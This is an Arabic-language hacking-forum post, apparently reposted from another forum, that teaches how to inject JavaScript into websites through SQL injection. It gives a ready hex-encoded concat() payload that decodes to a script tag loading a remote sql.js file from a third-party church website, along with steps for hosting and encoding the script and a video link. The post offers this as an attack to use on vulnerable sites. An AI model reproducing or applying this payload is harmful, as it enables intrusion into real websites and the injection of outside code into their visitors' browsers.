بسم الله الرحمن الرحيم

راح نستفيد بهاد الدرس من مبدا تشغيل ال جافا سكربت بثغرات sql
بنضع بالعمود المصاب كود جافا سكربت لو اشتغل ببقى شغال عنا الجافا بالعمود هاد
وغالبا يكون شغال الا اذا الحقن من نوع txt



الان عنا سكربت من الاخر اشي فاخر
بلزم ترفعه ع موقع عشان تلعب لعبتك انا بالشرح رفعته هنا

اقتباس:
http://www.emmanuelbiblechapel.org/sql.js
اقتباس:
<script src="link"></script>
وبعد شفرته من هذا الموقع

كود PHP:
http://www.string-functions.com/string-hex.aspx
وثم تم التشفير وهذا هو .......

كود PHP:
concat((0x3c736372697074207372633d27687474703a2f2f 7777772e656d6d616e75656c6269626c6563686170656c2e6f 72672f73716c2e6a73273e3c2f7363726970743e))volcano

والان رابط الشرح

http://www.youtube.com/watch?v=my30hsodW5Q


http://ponymagic.diosdelared.com/

وشكرا

منقووول للفايدة :
http://www.vbspiders.com/vb/t48292.html
KaLa$nikoV

موفقين